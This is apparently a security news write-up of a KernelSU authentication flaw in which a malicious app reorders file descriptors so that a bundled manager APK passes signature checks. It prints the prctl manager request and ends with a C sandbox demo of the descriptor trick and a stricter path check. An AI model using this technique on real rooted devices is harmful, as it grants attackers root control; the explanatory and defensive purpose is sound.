A critical security vulnerability found in popular Android rooting frameworks could allow malicious applications to fully compromise rooted devices, giving attackers complete system control without the user's knowledge.
The vulnerability, first identified in KernelSU version 0.5.7, demonstrates how a seemingly robust authentication mechanism can be circumvented by a simple but clever exploitation technique.
Rooting frameworks like KernelSU, APatch, SKRoot, and Magisk have gained widespread adoption among Android users seeking administrative privileges on their devices.
These tools operate by patching the Android kernel and hooking into critical system functions, creating communication channels between kernel space and user applications.
However, this deep system integration comes with significant security risks, particularly when the authentication mechanism fails to adequately verify the legitimacy of the requesting application.
The vulnerability exploits a fundamental weakness in how KernelSU authenticates manager applications.
When an application requests manager privileges through the prctl system call using the magic value 0xDEADBEEF, the framework performs three verification checks: validating the supplied data directory path, confirming directory ownership, and verifying the APK's digital signature.
The first two checks are trivially satisfied by any malicious application, since it can simply supply its own data directory, which it owns. The signature verification step, however, contains a critical flaw that can be exploited.
Zimperium researchers identified that KernelSU's signature verification relies on scanning the requesting process's file descriptor table for the first file matching the pattern /data/app/*/base.apk.
This approach assumes the discovered APK belongs to the requesting application, but an attacker can manipulate file descriptor ordering to trick the kernel into validating the legitimate manager's signature instead of that of the attacker's own malicious APK.
Superior File Descriptor Manipulation Assault
The exploitation technique centers on subtle file descriptor manipulation that allows a malicious application to impersonate the legitimate KernelSU manager.
Attackers accomplish this by bundling the official KernelSU manager APK inside their malicious application and strategically opening it before making the authentication request to the kernel.
The attack sequence begins with the malicious application identifying the file descriptor of its own base.apk and locating a free lower-numbered descriptor. If none exists, the attacker closes stdin (file descriptor 0) to create one, since open() always returns the lowest unused descriptor.
The application then opens the bundled legitimate KernelSU manager APK, typically placed in the lib directory at a path like /data/app//.com.attacker.manager/lib//base.apk. Because the wildcard check does not constrain how deep the path is below /data/app/, this path still satisfies KernelSU's filtering criteria while carrying the authentic manager signature.
// Malicious authentication request: the same prctl call the genuine manager makes
#include <sys/prctl.h>
#include <cstdint>
#define KERNEL_SU_OPTION 0xDEADBEEF          // KernelSU's prctl magic value
// CMD_BECOME_MANAGER is KernelSU's own command constant for this request
const char* data_path = "/data/data/com.attacker.manager";   // attacker's own data dir, which it owns
int32_t result = -1;
prctl(KERNEL_SU_OPTION, CMD_BECOME_MANAGER, data_path, nullptr, &result);
When KernelSU performs the signature verification, it encounters the legitimate manager's APK first in the file descriptor table and validates that signature, unknowingly granting manager privileges to the malicious application.
Once authenticated as the manager, the attacker gains access to powerful commands including CMD_GRANT_ROOT, CMD_ALLOW_SU, and CMD_SET_SEPOLICY, effectively achieving full system compromise.
The vulnerability's impact extends beyond individual devices to enterprise environments, where rooted devices already pose significant security risks.
Organizations using mobile device management solutions should implement comprehensive detection mechanisms to identify rooting tools and prevent exploitation of vulnerabilities like this one before they lead to data breaches or unauthorized system access.
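To make the ordering trick concrete, the following added C example (written for this article; it is not the article's or KernelSU's code) models the vulnerable scan as a userland walk of /proc/self/fd over a constructed temporary directory that stands in for /data/app/, replays the open/close sequence described above so the bundled manager APK lands on descriptor 0, and then applies a stricter structural check that ties the matched APK to the requesting package. The stricter check is an illustration of one possible hardening, not KernelSU's actual fix; the directory names and the prefix/suffix modelling of the /data/app/*/base.apk filter are assumptions.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable model (assumption): walk the fd table in ascending order and return the
 * first fd whose path starts with `prefix` (standing in for /data/app/) and ends with
 * "/base.apk". The wildcard is treated as "anything in between", which is exactly why a
 * deeper lib/.../base.apk path also matches. Copies the winning path into `out`. */
static int first_matching_apk_fd(const char *prefix, char *out, size_t outlen) {
    DIR *d = opendir("/proc/self/fd");
    if (!d) return -1;
    int best = -1;
    size_t pl = strlen(prefix);
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (e->d_name[0] == '.') continue;
        int fd = atoi(e->d_name);
        if (fd == dirfd(d)) continue;                 /* skip the directory handle itself */
        char link[64], target[512];
        snprintf(link, sizeof link, "/proc/self/fd/%d", fd);
        ssize_t n = readlink(link, target, sizeof target - 1);
        if (n < 0) continue;
        target[n] = '\0';
        size_t tl = (size_t)n;
        if (tl < pl + 9 || strncmp(target, prefix, pl) != 0 ||
            strcmp(target + tl - 9, "/base.apk") != 0)
            continue;
        if (best < 0 || fd < best) {                  /* readdir order is arbitrary: keep lowest fd */
            best = fd;
            snprintf(out, outlen, "%s", target);
        }
    }
    closedir(d);
    return best;
}

/* Stricter structural check (illustration only, not KernelSU's patch): accept only
 * prefix + "<install dir>/" + pkg [+ "-<suffix>"] + "/base.apk", so an APK buried under
 * the requester's lib directory can never be the one whose signature is trusted. */
static int apk_belongs_to_package(const char *path, const char *prefix, const char *pkg) {
    size_t pl = strlen(prefix);
    if (strncmp(path, prefix, pl) != 0) return 0;
    const char *p = strchr(path + pl, '/');          /* end of the install-dir component */
    if (!p || p == path + pl) return 0;
    p++;
    size_t kl = strlen(pkg);
    if (strncmp(p, pkg, kl) != 0) return 0;
    p += kl;
    if (*p == '-') { p++; while (*p && *p != '/') p++; }   /* optional "-<random>" suffix */
    return strcmp(p, "/base.apk") == 0;
}

static int mkdirs(const char *path) {
    char tmp[256];
    snprintf(tmp, sizeof tmp, "%s", path);
    for (char *p = tmp + 1; *p; p++) {
        if (*p != '/') continue;
        *p = '\0';
        if (mkdir(tmp, 0700) < 0 && errno != EEXIST) return -1;
        *p = '/';
    }
    return (mkdir(tmp, 0700) < 0 && errno != EEXIST) ? -1 : 0;
}

static int touch(const char *path) {
    char dir[256];
    snprintf(dir, sizeof dir, "%s", path);
    char *slash = strrchr(dir, '/');
    if (slash) { *slash = '\0'; if (mkdirs(dir) < 0) return -1; }
    int fd = open(path, O_WRONLY | O_CREAT, 0600);
    if (fd < 0) return -1;
    close(fd);
    return 0;
}

/* Replays the attack inside a constructed sandbox directory (not a real Android layout).
 * Returns the fd the vulnerable scan chose; copies its path to `matched` and the
 * /data/app/ stand-in to `prefix`. */
static int demo_attack(char *matched, size_t mlen, char *prefix, size_t plen) {
    char root[] = "/tmp/ksudemo.XXXXXX";
    if (!mkdtemp(root)) return -1;
    char own[256], bundled[256];
    snprintf(prefix, plen, "%s/app/", root);
    snprintf(own, sizeof own, "%sr1/com.attacker.manager/base.apk", prefix);
    snprintf(bundled, sizeof bundled, "%sr1/com.attacker.manager/lib/arm64/base.apk", prefix);
    if (touch(own) < 0 || touch(bundled) < 0) return -1;
    int own_fd = open(own, O_RDONLY);             /* step 1: the app's own APK sits on some fd */
    close(0);                                     /* step 2: no free lower fd, so give up stdin */
    int bundled_fd = open(bundled, O_RDONLY);     /* step 3: lowest free fd is now 0 */
    if (own_fd < 0 || bundled_fd != 0) return -1;
    return first_matching_apk_fd(prefix, matched, mlen);   /* step 4: what the kernel sees first */
}

int main(void) {
    char matched[256], prefix[256];
    int fd = demo_attack(matched, sizeof matched, prefix, sizeof prefix);
    printf("vulnerable scan picked fd %d -> %s\n", fd, matched);
    printf("strict check accepts it as the requester's own APK: %s\n",
           apk_belongs_to_package(matched, prefix, "com.attacker.manager") ? "yes" : "no");
    return 0;
}
```

The scan returns descriptor 0 pointing at the bundled manager APK even though the requester's own base.apk is also open, which is the whole vulnerability in miniature; the structural check rejects that path while still accepting a normally laid-out /data/app/<dir>/<pkg>[-<suffix>]/base.apk. Any real fix also has to bind the verified APK to the calling UID, which this userland model cannot show.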